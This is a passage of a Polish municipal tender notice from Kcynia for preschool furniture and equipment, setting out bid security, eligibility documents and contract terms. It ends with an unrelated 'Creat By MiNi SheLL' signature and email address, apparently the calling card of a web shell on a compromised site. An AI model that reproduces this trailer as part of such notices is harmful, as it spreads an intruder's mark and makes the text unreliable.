3)	Podane kolory korpusów mebli są przykładowe. Wykonawcy mogą zaproponować inne kolory korpusów o odcieniu i kolorystyce maksymalnie zbliżonych do podanych (jasne). Ważne jest zachowanie jednolitości kolorystycznej korpusów.
4)	Podane kolory frontów (blatów) mebli są przykładowe. Wykonawcy mogą zaproponować inne, podobne kolory frontów (blatów), tj. żywe, radosne, energetyzujące.
5)	Wykonawcy, w ramach ceny wykonania zamówienia podanej w swojej ofercie, zobowiązani są wykonać montaż i ustawienie mebli w miejscach wskazanych przez osoby zarządzające placówkami oraz instalację i przetestowanie poprawności działania sprzętu RTV/AGD!
III.	Szczegółowy opis materiałów stanowiących dostawę Zamawiającego:
Zamawiający nie przewiduje realizacji zamówienia z wykorzystaniem dostawy inwestorskiej - wszystkie materiały (urządzenia) niezbędne do wykonania zamówienia dostarcza Wykonawca.
IV.	Dodatkowe informacje:
1.	Dostarczone przedmioty / towary / sprzęt winien być objęty gwarancją nie krótszą niż wskazana w pkt. VI SIWZ.
2.	Zamawiający, z uwagi na specyfikę przedmiotu zamówienia, jego skomplikowanie i dużą różnorodność składających się nań materiałów, urządzeń i sprzętu informuje, że przygotowując opis przedmiotu zamówienia korzystał z katalogów producentów i danych z Internetu. 
W żadnym wypadku nie oznacza to, że Zamawiający wskazuje konkretne produkty, których wymaga.
Produkty oferowane przez Wykonawcę mogą być równoważne, co oznacza iż winny posiadać cechy i właściwości produktów wymienionych w tabeli i umożliwiać ich zastosowanie w tym samym celu i w ten sam sposób, a tym samym umożliwiać osiągnięcie rezultatów ich stosowania jak w przypadku produktów wskazanych w ww. tabeli.
3.	Miejsca dostawy i ilości poszczególnych produktów oraz osoby do kontaktu:
Szczegółowe dane zostaną podane Wykonawcy, który złoży najkorzystniejszą ofertę.
Na potrzeby przygotowania oferty Zamawiający informuje, że oddziały przedszkolne, do których należy dostarczyć oferowany sprzęt znajdują się w miejscowościach: Kcynia (2 oddziały), Laskownica (2 oddziały), Palmierowo (1 oddział), Dobieszewo (1 oddział), Sipiory (1 oddział), Rozstrzębowo (1 oddział), Dziewierzewo (2 oddziały), Mycielewo (2 oddziały)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.13.00.00-2, 32.00.00.00-3, 37.52.00.00-9, 30.19.52.00-4, 38.65.10.00-3, 39.53.10.00-3, 39.71.34.30-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości 10 000,00. zł (słownie: dziesięć tysięcy złotych).
2.	Wadium może być wniesione w:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczych kas oszczędnościowo-kredytowych, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2007.42.275 j.t. ze zmianami).
3.	W przypadku wadium niegotówkowego (poręczenia lub gwarancje) Wykonawca może, według swojego wyboru:
a)	złożyć oryginał dokumentu potwierdzającego wniesienie wadium u Zamawiającego, a kserokopię tak złożonego zabezpieczenia wadialnego, potwierdzoną przez pracownika przyjmującego zabezpieczenie, dołączyć do dokumentów ofertowych,
b)	oryginał dokumentu potwierdzającego wniesienie wadium dołączyć do oferty - dokument ten nie będzie stanowił części oferty i zostanie zwrócony Wykonawcy po zakończeniu postępowania, chyba że z treści dokumentu wynika, że nie jest to konieczne (w szczególności: jest w nim zakreślona data obowiązywania, a jego wystawca zastrzegł, iż po jej upływie poręczenie lub gwarancja wygasa).
4.	W przypadku gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
a)	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji), zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt IX ppkt 10 lit. a-d - bez potwierdzania tych okoliczności,
b)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
c)	miejsce i termin zwrotu gwarancji.
5.	W przypadku wnoszenia wadium w pieniądzu wadium ma zostać wniesione przelewem na rachunek bankowy Zamawiającego. O wniesieniu wadium w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego, tj. uznania rachunku Zamawiającego, która musi nastąpić przed terminem składania ofert.
6.	Przelewu należy dokonać na rachunek bankowy podany w pkt I ppkt 2 SIWZ.
7.	Na poleceniu przelewu (blankiecie wpłaty) należy podać tytuł przelewu: >>Wadium przetargowe - RI.271.1.4.2015<< oraz podać informację o numerze rachunku bankowego Wykonawcy, na które ma zostać dokonany zwrot wadium.
8.	Zamawiający niezwłocznie zwróci Wykonawcy wadium, jeżeli:
a)	upłynie termin związania ofertą,
b)	zostanie zawarta umowa i wniesione zabezpieczenie należytego wykonania umowy,
c)	Zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia.
9.	Zamawiający niezwłocznie zwróci wadium na pisemny wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.
10.	Jeżeli wadium wniesione będzie w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym będzie ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
a)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie >>innej omyłki<<, o której mowa w pkt. XV ppkt 7 SIWZ, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej,
Wykonawca, którego oferta została wybrana:
b)	odmówi podpisania umowy na warunkach określonych w ofercie,
c)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
d)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zweryfikuje spełnianie tego warunku w oparciu o: aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zweryfikuje spełnianie tego warunku w oparciu o: 
a) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. VIII ppkt 1 lit. b SIWZ, z zastrzeżeniem lit. b),
b) wykaz wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie (Załącznik nr 6) - w celu potwierdzenia spełnienia wymagania z pkt. VII ppkt 2 lit. e SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zweryfikuje spełnianie tego warunku w oparciu o: 
a) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. VIII ppkt 1 lit. b SIWZ, z zastrzeżeniem lit. b),
b) oświadczenia podmiotów, o których mowa w pkt. III ppkt 5 SIWZ, stwierdzające, że udostępniają Wykonawcy swoje zasoby osobowe niezbędne do realizacji zamówienia na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zweryfikuje spełnianie tego warunku w oparciu o: 
a) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. VIII ppkt 1 lit. b SIWZ, z zastrzeżeniem lit. b),
b) oświadczenia podmiotów, o których mowa w pkt. III ppkt 5 SIWZ, stwierdzające, że udostępniają Wykonawcy swoje zasoby osobowe niezbędne do realizacji zamówienia na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zweryfikuje spełnianie tego warunku w oparciu o: 
a) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. VIII ppkt 1 lit. b SIWZ, z zastrzeżeniem lit. b),
b) opłaconą polisę lub inny dokument ubezpieczenia, na kwotę wskazaną z pkt. VII ppkt 2 lit. d SIWZ, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w okresie realizacji zamówienia - w celu potwierdzenia spełnienia wymagania z pkt. VII ppkt 2 lit. d SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawcy zobowiązani są załączyć do oferty:
a)	dowód wniesienia wadium - w przypadku wadium niegotówkowego, należy złożyć dokument (w szczególności: gwarancję lub poręczenie) potwierdzający przyjęcie przez gwaranta zobowiązania do zapłaty wadium, zgodnie z zapisami pkt. IX SIWZ,
b)	zestawienie oferowanych produktów, sporządzone w oparciu o Opis Przedmiotu Zamówienia (Rozdział II SIWZ), zawierające dla każdego produktu: informacje umożliwiające weryfikację ich parametrów względem postawionych w OPZ wymagań (w szczególności: karty katalogowe, instrukcje obsługi) oraz zdjęcie produktu = patrz: ogłoszenie - pkt. III.5 tiret pierwsze,
c)	wykaz podwykonawców i powierzony im zakres zamówienia (Załącznik nr 7) - w celu potwierdzenia, które z części zamówienia zamierza powierzyć podwykonawcom,
d)	dokument, w którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Okres gwarancji - 10</li>
<li>3 - Termin realizacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
2.	Zamawiający przewiduje zmianę niniejszej umowy, w szczególności w stosunku do treści oferty Wykonawcy, w następujących przypadkach:
1)	konieczności zmiany terminu realizacji przedmiotowej umowy w przypadku:
a)	zaistnienia sytuacji skutkującej brakiem możliwości zakończenia dostaw w terminie wskazanym w § 2 ust. 1 z przyczyn leżących po stronie Zamawiającego,
b)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowanych przez lub dających się przypisać Zamawiającemu bądź innemu podmiotowi podległemu / zależnemu od Zamawiającego,
c)	wystąpienia opóźnienia, które ma lub będzie miało wpływ na wykonanie przedmiotu umowy, spowodowanego działaniem siły wyższej lub klęską żywiołową - o czas trwania przyczyny opóźnienia,
2)	zmiany uzasadnionej okolicznościami wskazanymi w art. 357/1 kc,
3)	zmiany podwykonawcy - na pisemny, uzasadniony wniosek Wykonawcy dot. zmiany podwykonawcy (w tym rezygnacji z udziału podwykonawcy lub wprowadzenia podwykonawcy do zakresu zamówienia pierwotnie realizowanego przez Wykonawcę) w realizacji przedmiotu zamówienia - wyłącznie po przedstawieniu przez Wykonawcę pisemnego oświadczenia podwykonawcy o rezygnacji z udziału w realizacji przedmiotu umowy oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót w ramach przedmiotowego zamówienia. Jeżeli zmiana dotyczy podmiotu, na zasobach którego Wykonawca polegał wykazując spełnienie warunków udziału w postępowaniu albo wprowadzenia takiego podmiotu w odniesieniu do zasobów, którymi dysponowanie pierwotnie wykazywał Wykonawca, Zamawiający dopuści zmianę pod warunkiem, że nowy podmiot (a w pozostałych przypadkach - nowy podwykonawca) wykaże spełnianie tych warunków w zakresie nie mniejszym niż podmiot dotychczasowy.
3.	Zmiana umowy może nastąpić z inicjatywy każdej ze Stron poprzez przedstawienie drugiej Stronie propozycji zmian w formie pisemnej zawierającej w szczególności: 
1)	opis zmiany, 
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia Wykonawcy,
4)	czas wykonania zmiany oraz jej wpływ na termin realizacji umowy.
4.	Zmiany umowy mające wpływ na termin wykonania przedmiotu umowy winny być zgłaszane Zamawiającemu przez Wykonawcę w nieprzekraczalnym terminie 3 dni od wystąpienia (powstania / zajścia) okoliczności mających wpływ na termin wykonania przedmiotu umowy.
5.	Jakiekolwiek zmiany do umowy zostaną wprowadzone pod warunkiem potwierdzenia zaistniałych okoliczności w formie opisowej przez powołaną w tym celu przez Zamawiającego komisję, w skład której wejdą w szczególności osoby wskazane w § 6 umowy.
6.	Podstawy zmiany umowy zawarte w niniejszym paragrafie stanowią katalog zmian, na które Zamawiający może wyrazić zgodę i nie oznaczają w żadnej mierze zobowiązania Zamawiającego do wyrażenia takiej zgody.
7.	Istotnych zmian niniejszej umowy w rozumieniu art. 144 pzp nie stanowią zmiany dotyczące obsługi administracyjno-organizacyjnej umowy, w szczególności zmiana nr rachunku bankowego bądź zmiana danych teleadresowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.kcynia.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kcyni
ul. Rynek 23
89-240 Kcynia
pok. 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2015 godzina 09:00, miejsce: Urząd Miejski w Kcyni
ul. Rynek 23
89-240 Kcynia
Sekretariat - pok. 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zamówienie jest w całości finansowane z programu pn.: >>Likwidacja barier w dostępie do edukacji przedszkolnej poprzez modernizację i doposażenie oddziałów przedszkolnych na terenie gminy Kcynia<< projekt nr WND - POKL.09.01.01-04-001/15 w ramach Priorytetu IX. >>Rozwój wykształcenia i kompetencji w regionach<< działania 9.1 >>Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty<< Poddziałania 9.1.1 >>Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej<<..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com